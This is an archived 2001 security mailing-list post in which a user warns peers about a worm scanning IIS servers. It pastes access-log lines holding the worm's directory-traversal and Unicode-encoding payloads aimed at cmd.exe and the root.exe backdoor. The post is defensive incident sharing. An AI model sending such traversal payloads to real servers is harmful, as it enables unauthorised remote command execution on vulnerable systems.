New Worm ?

• Previous message: Jonathan Bloomquist: "Re: Forensics on Word Documents"
• Next in thread: Billy Smith: "Re: New Worm ?"
• Reply: Billy Smith: "Re: New Worm ?"
• Reply: Ed Shirley: "Re: New Worm ?"
• Reply: Cory McIntire: "Re: New Worm ?"
• Reply: Paul W. Roach III: "Re: New Worm ?"
• Reply: Andrew Sheldon: "Re: New Worm ?"
• Reply: Oliver Ehli: "Re: New Worm ?"
• Reply: Becher, Jim: "RE: New Worm ?"
• Reply: Mark Challender: "RE: New Worm ?"
• Reply: Andreas Wiesmann: "Re: New Worm ?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello, 
I and a few others I know are getting bombard on our machines with IIS 
requests....looks like another worm, and its much smarter than before, it 
seems to stay within the same class A and sometimes the same class B as the 
attacking machine is in. here is an excerpt of what i believe is the full 
scan....

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

just thought I would let you guys know...this one looks bad fella.....thank 
god for apache.....that is of course, if there isnt a huge bog down on the 
net....=[

cory

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

• Next message: daniel heinonen: "Re: Forensics on Word Documents"
• Previous message: Jonathan Bloomquist: "Re: Forensics on Word Documents"
• Next in thread: Billy Smith: "Re: New Worm ?"
• Reply: Billy Smith: "Re: New Worm ?"
• Reply: Ed Shirley: "Re: New Worm ?"
• Reply: Cory McIntire: "Re: New Worm ?"
• Reply: Paul W. Roach III: "Re: New Worm ?"
• Reply: Andrew Sheldon: "Re: New Worm ?"
• Reply: Oliver Ehli: "Re: New Worm ?"
• Reply: Becher, Jim: "RE: New Worm ?"
• Reply: Mark Challender: "RE: New Worm ?"
• Reply: Andreas Wiesmann: "Re: New Worm ?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:12:45 PDT